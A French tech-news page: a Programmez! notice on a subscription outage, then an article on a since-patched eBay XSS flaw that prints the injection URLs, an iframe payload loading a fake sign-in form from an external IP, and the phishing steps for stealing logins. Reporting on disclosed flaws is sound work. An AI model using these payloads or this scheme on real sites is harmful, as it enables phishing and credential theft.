Panne sur les abonnements Programmez!

Les informations relatives aux abonnements et les accès aux archives PDF liés aux abonnements papier ne fonctionnent plus depuis plusieurs jours dans les comptes utilisateur sur notre site. Comme vous l'avez constaté, ou lu dans les medias, de nombreux éditeurs de presse connaissent une situation similaire. Cette situation est due à une panne informatique de grande ampleur chez le Groupe GLI, la société qui gère nos abonnements papier. Cette panne générale a fait tomber les bases de données et les API Web, empêchant toute connexion entre le site de Programmez! et la base des abonnés située chez notre prestataire. Cette situation dure depuis dimanche soir. Programmez! n'est pas le seul magazine concerné par cette défaillance. Nous essayons d'avoir des informations plus précises de la part du groupe GLI. Nous vous tiendrons informés de l'évolution de la situation.

Tout fonctionne normalement en ce qui concerne les abonnements PDF et les accès aux archives PDF liés, ceux-ci étant gérés par notre site seul.

En dépit de ce problème, toutes les commandes de nouveaux abonnements ou de réabonnements passées sur notre site seront traitées et honorées normalement.

Programmez! a toutefois su reconstituer sa base abonnés quasi intégralement. Programmez! 198 sera expédié normalement à la fin de ce moi de juin. Un envoi supplémentaire pour les abonnés non livrés sera fait dès que GLI aura restauré son système.

Une importante vulnérabilité XSS colmatée sur eBay

Par:
admin

mer, 13/01/2016 - 16:14

L'existence de cette vulnérabilité a été révélée dans un billet de blog écrit par un chercheur en sécurité qui signe du pseudo de MLT.

Cette vulnérabilité est étonnante à plus d'un titre. D'abord parce qu'elle existe sur un site comme eBay et que son exploit pouvait permettre d'obtenir des noms et des mots de passe d'utilisateurs très facilement. Ensuite parce que eBay aurait mis un mois pour la combler. Selon MLT, eBay, alerté par lui quant à l'existence de cette vulnérabilité, a demandé immédiatement des explications complémentaires à son sujet. Mais une fois ces informations envoyées : rien. Plus de communication, pas de correctif. Ce n'est qu'un mois plus tard que la vulnérabilité a été corrigée, et, toujours selon MLT, uniquement parce que les media ont eu vent de l'affaire.

Enfin, elle est étonnante par son caractère. Il s'agit d'une faille en Cross Site Scripting (XSS). Mais alors que normalement, un site filtre les données fournies dans un formulaire pour éviter l'injection de code via des balises HTML, l'URL vulnérable elle, exécutait du code JavaScript fourni sans aucune précaution semble-t-il.

Exemple :

http:  //ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)

affichait le cookie du document en cours

Partant de là, eBay devient un terrain de jeu pour hackers qui veulent se faire la main en XSS :-) Exploiter cette vulnérabilité est très simple, à la portée de tous.

- Tout d'abord on créé un faux site qui ressemble à eBay. Ce faux site contient un lien de connexion, qui envoie sur le vrai site eBay, mais pas sur la vraie page de connexion :-) Au lieu de cela, le lien envoie sur la page vulnérable, avec, en paramètre dans l'URL, le code JavaScript à exécuter. MLT donne comme exemple un code qui injecte dans le DOM un iframe dont la source est un formulaire hébergé sur son serveur, qui est donc le serveur du hacker attaquant dans l'exemple:

document.write(‘<iframe src=”http:  //45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’)

L'URL complète et encodée est :

http:  //ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20
src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html
%22%20width=%221500%22%20height=%221000%22%3E%27%29

- On envoie ensuite un mail de phishing à la victime pour l'inciter à se connecter sur eBay. Le mail contient un lien sur le faux site eBay.

- Lorsque la victime clique sur le faux lien de connexion dans le faux site, elle arrive sur la page vulnérable du vrai site eBay, qu'elle confond avec la vraie page de connexion, car l'iframe injecté est conçu pour occuper tout l'écran et faire descendre le vrai contenu aux antipodes :-)

- la victime saisit son nom et son mot de passe. Le faux formulaire envoie les données ainsi volées sur le serveur de l'attaquant, qui n'a plus qu'à s'en servir...

La vidéo ci-dessous, proposée par MLT, illustre le mécanisme.